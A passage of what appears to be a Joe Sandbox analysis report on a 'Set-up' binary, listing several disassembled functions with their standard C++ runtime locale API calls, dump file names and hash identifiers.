                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$free$H_prolog3$??1_Maklocstr$??0_??0exception@std@@ExceptionGetcvtGetdateorderGetdays@_Getmonths@_H_prolog3_catchInit@?$time_get@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowU?$char_traits@_V12@V12@@V?$istreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 2040812796-0
                                                                                              • Opcode ID: 230ede3c6be5dfe0afa4b66684d6730263d088707d4631a81bbb25a06eeac772
                                                                                              • Instruction ID: 042fb80c169625f4381785b56fe90371dd47c140b2bd67fad689fb0942968556
                                                                                              • Opcode Fuzzy Hash: 230ede3c6be5dfe0afa4b66684d6730263d088707d4631a81bbb25a06eeac772
                                                                                              • Instruction Fuzzy Hash: ADF06578926118DBD714DFB8D5517DCBBF06F54704F508459A045B7380EBBC5B04DBA1
                                                                                              Function 6BC25DCA Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25DD1
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(00000000,?,?,00000028), ref: 6BC25DF9
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,?,?,00000028), ref: 6BC25E04
                                                                                                • Part of subcall function 6BC233A5: _Getcvt.MSVCP100(00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?), ref: 6BC233AD
                                                                                                • Part of subcall function 6BC233A5: ?_Gettnames@_Locinfo@std@@QBE?AV_Timevec@2@XZ.MSVCP100(?,00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F), ref: 6BC233BF
                                                                                                • Part of subcall function 6BC233A5: free.MSVCR100 ref: 6BC233CF
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,00000028), ref: 6BC25E0C
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtGettnames@_Init@?$time_put@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTimevec@2@U?$char_traits@_V12@V12@@V?$ostreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 3973935344-0
                                                                                              • Opcode ID: 21a013d773996acbbd804ce5a6878bd2fee11fd8aa030ac7a5a9bd2413806e93
                                                                                              • Instruction ID: f7bc149f6f88924e4cbb20973df830e4c6e2b4aaed99037fe36f878446e3013f
                                                                                              • Opcode Fuzzy Hash: 21a013d773996acbbd804ce5a6878bd2fee11fd8aa030ac7a5a9bd2413806e93
                                                                                              • Instruction Fuzzy Hash: 23F0A075921109EFDB10DFA4C51178CBBB1BF50719F10C41DA05567250EB7C5B05CB90
                                                                                              Function 6BC25CE5 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25CEC
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,?,?,00000028), ref: 6BC25D16
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,?,?,00000028), ref: 6BC25D21
                                                                                                • Part of subcall function 6BC233A5: _Getcvt.MSVCP100(00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?), ref: 6BC233AD
                                                                                                • Part of subcall function 6BC233A5: ?_Gettnames@_Locinfo@std@@QBE?AV_Timevec@2@XZ.MSVCP100(?,00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F), ref: 6BC233BF
                                                                                                • Part of subcall function 6BC233A5: free.MSVCR100 ref: 6BC233CF
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,00000028), ref: 6BC25D29
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtGettnames@_Init@?$time_put@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTimevec@2@U?$char_traits@_V12@V12@@V?$ostreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 3973935344-0
                                                                                              • Opcode ID: 084cb01a92c54233d4c9d8fe3205562ae7173b7d15965b8f43b7c5c8170682ee
                                                                                              • Instruction ID: 01e353e0a3aabbd0b30c668c10f71f9af1d9e57a75973244fca112bd93c9781d
                                                                                              • Opcode Fuzzy Hash: 084cb01a92c54233d4c9d8fe3205562ae7173b7d15965b8f43b7c5c8170682ee
                                                                                              • Instruction Fuzzy Hash: BDF0E575925208DFD710DFA4C51278CB7F06F50715F10841DA045A7240FB7C5B45CBA0
                                                                                              Function 6BC1CA6A Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1CA71
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC1CA93
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ctype.LIBCPMT(?,00000028), ref: 6BC1CA9E
                                                                                                • Part of subcall function 6BC1CB97: _Getctype.MSVCP100(?,00000000,00000000,?), ref: 6BC1CBA8
                                                                                                • Part of subcall function 6BC1CB97: _Getcvt.MSVCP100(00000000,00000000,?), ref: 6BC1CBB7
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,00000028), ref: 6BC1CAA6
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetctypeGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@ctypestd::_
                                                                                              • String ID:
                                                                                              • API String ID: 843327012-0
                                                                                              • Opcode ID: ac725052715e4f65608edf4e53c7209f3520b1be5abeacd3e458f7a84acf5075
                                                                                              • Instruction ID: d447b90e483f742c5fc4acacf0613ab465cc1f87be6c95ec034e1a8148d45234
                                                                                              • Opcode Fuzzy Hash: ac725052715e4f65608edf4e53c7209f3520b1be5abeacd3e458f7a84acf5075
                                                                                              • Instruction Fuzzy Hash: 0DE09A78926218DBC714DFA4D552ACCBAB0AF54644F50842DB045BB240FB7C5B45DBA4
                                                                                              Function 6BC1BF3A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1BF41
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC1BF63
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC1BF68
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC1BF76
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 6a4e815f421f65cca5f91920e0a9a1e1f57fb20d72006ddb73a0a4d31c302a55
                                                                                              • Instruction ID: 5cf95b79a1bda13f43e6f4426b5ca525a623b88a6d128989a30aba755301c7a2
                                                                                              • Opcode Fuzzy Hash: 6a4e815f421f65cca5f91920e0a9a1e1f57fb20d72006ddb73a0a4d31c302a55
                                                                                              • Instruction Fuzzy Hash: C5E06578825215CBC724DFB4C15268CBAF0AF54714F50C82EA099AB740EB7C9B40DF60
                                                                                              Function 6BC1BD0F Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1BD16
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC1BD38
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC1BD3D
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC1BD4B
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 20f89219d01209c1deac6855acb1c386a44fc6b47c25318051fab935ca7ee5eb
                                                                                              • Instruction ID: 45f9629dd71ecedaec8de7dfd475657f07057e370d4b3a80597dda1c4662f519
                                                                                              • Opcode Fuzzy Hash: 20f89219d01209c1deac6855acb1c386a44fc6b47c25318051fab935ca7ee5eb
                                                                                              • Instruction Fuzzy Hash: 0BE06578825214CBC724DFB4C14268CBAF0AF54754F50C82EA099AB340EB7C9B40DF60
                                                                                              Function 6BC2539D Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC253A4
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC253C6
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC253CB
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC253D9
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 04a4ff5c2db65b1174652bd93ae68b0df6c929c73c575d03b02590b57f2d9740
                                                                                              • Instruction ID: 58102fbceb2ad1af94c98a4088b2fd78aca13267f093bb978bad745b2b026c83
                                                                                              • Opcode Fuzzy Hash: 04a4ff5c2db65b1174652bd93ae68b0df6c929c73c575d03b02590b57f2d9740
                                                                                              • Instruction Fuzzy Hash: ADE032B88252148BC724DFA4C14268CBAF0AF54615F50C82EA099AB240EB7C9B40DF60
                                                                                              Function 6BC252BE Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC252C5
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC252E7
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC252EC
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC252FA
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 1792ba7a9ee69efbf5940647a1bfb71af81b7065c855267b26c4dbbcd4f12a57
                                                                                              • Instruction ID: cd7d2a814becfed789c5f311b8369aa5db0e8268c3f8eab8ab743347d61cdf0c
                                                                                              • Opcode Fuzzy Hash: 1792ba7a9ee69efbf5940647a1bfb71af81b7065c855267b26c4dbbcd4f12a57
                                                                                              • Instruction Fuzzy Hash: 35E06D78925614CBC714DF74C14268CBAF0AF54714F50C81EA099A7340EB7C9B40DF60
                                                                                              Function 6BC25174 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2517B
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC2519D
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC251A2
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC251B0
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
